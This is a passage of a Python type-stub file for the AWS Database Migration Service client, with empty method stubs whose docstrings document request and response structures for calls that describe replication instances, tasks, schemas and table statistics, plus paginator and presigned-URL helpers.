'IncludedAllocatedStorage': 123,
'AvailabilityZones': [
'string',
]
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **OrderableReplicationInstances** *(list) --*
The order-able replication instances available.
- *(dict) --*
- **EngineVersion** *(string) --*
The version of the replication engine.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **StorageType** *(string) --*
The type of storage used by the replication instance.
- **MinAllocatedStorage** *(integer) --*
The minimum amount of storage (in gigabytes) that can be allocated for the replication instance.
- **MaxAllocatedStorage** *(integer) --*
The minimum amount of storage (in gigabytes) that can be allocated for the replication instance.
- **DefaultAllocatedStorage** *(integer) --*
The default amount of storage (in gigabytes) that is allocated for the replication instance.
- **IncludedAllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **AvailabilityZones** *(list) --*
List of availability zones for this replication instance.
- *(string) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_pending_maintenance_actions(self, ReplicationInstanceArn: str = None, Filters: List = None, Marker: str = None, MaxRecords: int = None) -> Dict:
"""
For internal use only
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribePendingMaintenanceActions>`_
**Request Syntax**
::
response = client.describe_pending_maintenance_actions(
ReplicationInstanceArn='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
Marker='string',
MaxRecords=123
)
**Response Syntax**
::
{
'PendingMaintenanceActions': [
{
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **PendingMaintenanceActions** *(list) --*
The pending maintenance action.
- *(dict) --*
- **ResourceIdentifier** *(string) --*
The Amazon Resource Name (ARN) of the DMS resource that the pending maintenance action applies to. For information about creating an ARN, see `Constructing an Amazon Resource Name (ARN) <https://docs.aws.amazon.com/dms/latest/UserGuide/USER_Tagging.html#USER_Tagging.ARN>`__ in the DMS documentation.
- **PendingMaintenanceActionDetails** *(list) --*
Detailed information about the pending maintenance action.
- *(dict) --*
- **Action** *(string) --*
The type of pending maintenance action that is available for the resource.
- **AutoAppliedAfterDate** *(datetime) --*
The date of the maintenance window when the action will be applied. The maintenance action will be applied to the resource during its first maintenance window after this date. If this date is specified, any ``next-maintenance`` opt-in requests are ignored.
- **ForcedApplyDate** *(datetime) --*
The date when the maintenance action will be automatically applied. The maintenance action will be applied to the resource on this date regardless of the maintenance window for the resource. If this date is specified, any ``immediate`` opt-in requests are ignored.
- **OptInStatus** *(string) --*
Indicates the type of opt-in request that has been received for the resource.
- **CurrentApplyDate** *(datetime) --*
The effective date when the pending maintenance action will be applied to the resource. This date takes into account opt-in requests received from the ``ApplyPendingMaintenanceAction`` API, the ``AutoAppliedAfterDate`` , and the ``ForcedApplyDate`` . This value is blank if an opt-in request has not been received and nothing has been specified as ``AutoAppliedAfterDate`` or ``ForcedApplyDate`` .
- **Description** *(string) --*
A description providing more detail about the maintenance action.
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn:
The ARN of the replication instance.
:type Filters: list
:param Filters:
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:rtype: dict
:returns:
"""
pass
def describe_refresh_schemas_status(self, EndpointArn: str) -> Dict:
"""
Returns the status of the RefreshSchemas operation.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeRefreshSchemasStatus>`_
**Request Syntax**
::
response = client.describe_refresh_schemas_status(
EndpointArn='string'
)
**Response Syntax**
::
{
'RefreshSchemasStatus': {
'EndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'Status': 'successful'|'failed'|'refreshing',
'LastRefreshDate': datetime(2015, 1, 1),
'LastFailureMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
- **RefreshSchemasStatus** *(dict) --*
The status of the schema.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **Status** *(string) --*
The status of the schema.
- **LastRefreshDate** *(datetime) --*
The date the schema was last refreshed.
- **LastFailureMessage** *(string) --*
The last failure message for the schema.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:rtype: dict
:returns:
"""
pass
def describe_replication_instance_task_logs(self, ReplicationInstanceArn: str, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the task logs for the specified task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationInstanceTaskLogs>`_
**Request Syntax**
::
response = client.describe_replication_instance_task_logs(
ReplicationInstanceArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'ReplicationInstanceArn': 'string',
'ReplicationInstanceTaskLogs': [
{
'ReplicationTaskName': 'string',
'ReplicationTaskArn': 'string',
'ReplicationInstanceTaskLogSize': 123
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstanceTaskLogs** *(list) --*
An array of replication task log metadata. Each member of the array contains the replication task name, ARN, and task log size (in bytes).
- *(dict) --*
Contains metadata for a replication instance task log.
- **ReplicationTaskName** *(string) --*
The name of the replication task.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationInstanceTaskLogSize** *(integer) --*
The size, in bytes, of the replication task log.
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_instances(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about replication instances for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationInstances>`_
**Request Syntax**
::
response = client.describe_replication_instances(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationInstances': [
{
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationInstances** *(list) --*
The replication instances described.
- *(dict) --*
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP address of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP address of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: replication-instance-arn | replication-instance-id | replication-instance-class | engine-version
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_subnet_groups(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the replication subnet groups.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationSubnetGroups>`_
**Request Syntax**
::
response = client.describe_replication_subnet_groups(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationSubnetGroups': [
{
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationSubnetGroups** *(list) --*
A description of the replication subnet groups.
- *(dict) --*
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type Filters: list
:param Filters:
Filters applied to the describe action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_task_assessment_results(self, ReplicationTaskArn: str = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns the task assessment results from Amazon S3. This action always returns the latest results.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationTaskAssessmentResults>`_
**Request Syntax**
::
response = client.describe_replication_task_assessment_results(
ReplicationTaskArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'BucketName': 'string',
'ReplicationTaskAssessmentResults': [
{
'ReplicationTaskIdentifier': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskLastAssessmentDate': datetime(2015, 1, 1),
'AssessmentStatus': 'string',
'AssessmentResultsFile': 'string',
'AssessmentResults': 'string',
'S3ObjectUrl': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **BucketName** *(string) --*
- The Amazon S3 bucket where the task assessment report is located.
- **ReplicationTaskAssessmentResults** *(list) --*
The task assessment report.
- *(dict) --*
The task assessment report in JSON format.
- **ReplicationTaskIdentifier** *(string) --*
The replication task identifier of the task on which the task assessment was run.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskLastAssessmentDate** *(datetime) --*
The date the task assessment was completed.
- **AssessmentStatus** *(string) --*
The status of the task assessment.
- **AssessmentResultsFile** *(string) --*
The file containing the results of the task assessment.
- **AssessmentResults** *(string) --*
The task assessment results in JSON format.
- **S3ObjectUrl** *(string) --*
The URL of the S3 object containing the task assessment results.
:type ReplicationTaskArn: string
:param ReplicationTaskArn:
- The Amazon Resource Name (ARN) string that uniquely identifies the task. When this input parameter is specified the API will return only one result and ignore the values of the max-records and marker parameters.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_tasks(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None) -> Dict:
"""
Returns information about replication tasks for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationTasks>`_
**Request Syntax**
::
response = client.describe_replication_tasks(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string',
WithoutSettings=True|False
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationTasks': [
{
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationTasks** *(list) --*
A description of the replication tasks.
- *(dict) --*
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: replication-task-arn | replication-task-id | migration-type | endpoint-arn | replication-instance-arn
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type WithoutSettings: boolean
:param WithoutSettings:
Set this flag to avoid returning setting information. Use this to reduce overhead when settings are too large. Choose TRUE to use this flag, otherwise choose FALSE (default).
:rtype: dict
:returns:
"""
pass
def describe_schemas(self, EndpointArn: str, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the schema for the specified endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeSchemas>`_
**Request Syntax**
::
response = client.describe_schemas(
EndpointArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Schemas': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Schemas** *(list) --*
The described schema.
- *(string) --*
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_table_statistics(self, ReplicationTaskArn: str, MaxRecords: int = None, Marker: str = None, Filters: List = None) -> Dict:
"""
Returns table statistics on the database migration task, including table name, rows inserted, rows updated, and rows deleted.
Note that the "last updated" column the DMS console only indicates the time that AWS DMS last updated the table statistics record for a table. It does not indicate the time of the last update to the table.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeTableStatistics>`_
**Request Syntax**
::
response = client.describe_table_statistics(
ReplicationTaskArn='string',
MaxRecords=123,
Marker='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
**Response Syntax**
::
{
'ReplicationTaskArn': 'string',
'TableStatistics': [
{
'SchemaName': 'string',
'TableName': 'string',
'Inserts': 123,
'Deletes': 123,
'Updates': 123,
'Ddls': 123,
'FullLoadRows': 123,
'FullLoadCondtnlChkFailedRows': 123,
'FullLoadErrorRows': 123,
'LastUpdateTime': datetime(2015, 1, 1),
'TableState': 'string',
'ValidationPendingRecords': 123,
'ValidationFailedRecords': 123,
'ValidationSuspendedRecords': 123,
'ValidationState': 'string',
'ValidationStateDetails': 'string'
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **TableStatistics** *(list) --*
The table statistics.
- *(dict) --*
- **SchemaName** *(string) --*
The schema name.
- **TableName** *(string) --*
The name of the table.
- **Inserts** *(integer) --*
The number of insert actions performed on a table.
- **Deletes** *(integer) --*
The number of delete actions performed on a table.
- **Updates** *(integer) --*
The number of update actions performed on a table.
- **Ddls** *(integer) --*
The Data Definition Language (DDL) used to build and modify the structure of your tables.
- **FullLoadRows** *(integer) --*
The number of rows added during the Full Load operation.
- **FullLoadCondtnlChkFailedRows** *(integer) --*
The number of rows that failed conditional checks during the Full Load operation (valid only for DynamoDB as a target migrations).
- **FullLoadErrorRows** *(integer) --*
The number of rows that failed to load during the Full Load operation (valid only for DynamoDB as a target migrations).
- **LastUpdateTime** *(datetime) --*
The last time the table was updated.
- **TableState** *(string) --*
The state of the tables described.
Valid states: Table does not exist | Before load | Full load | Table completed | Table cancelled | Table error | Table all | Table updates | Table is being reloaded
- **ValidationPendingRecords** *(integer) --*
The number of records that have yet to be validated.
- **ValidationFailedRecords** *(integer) --*
The number of records that failed validation.
- **ValidationSuspendedRecords** *(integer) --*
The number of records that could not be validated.
- **ValidationState** *(string) --*
The validation state of the table.
The parameter can have the following values
* Not enabled—Validation is not enabled for the table in the migration task.
* Pending records—Some records in the table are waiting for validation.
* Mismatched records—Some records in the table do not match between the source and target.
* Suspended records—Some records in the table could not be validated.
* No primary key—The table could not be validated because it had no primary key.
* Table error—The table was not validated because it was in an error state and some data was not migrated.
* Validated—All rows in the table were validated. If the table is updated, the status can change from Validated.
* Error—The table could not be validated because of an unexpected error.
- **ValidationStateDetails** *(string) --*
Additional details about the state of validation.
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 500.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type Filters: list
:param Filters:
Filters applied to the describe table statistics action.
Valid filter names: schema-name | table-name | table-state
A combination of filters creates an AND condition where each record matches all specified filters.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
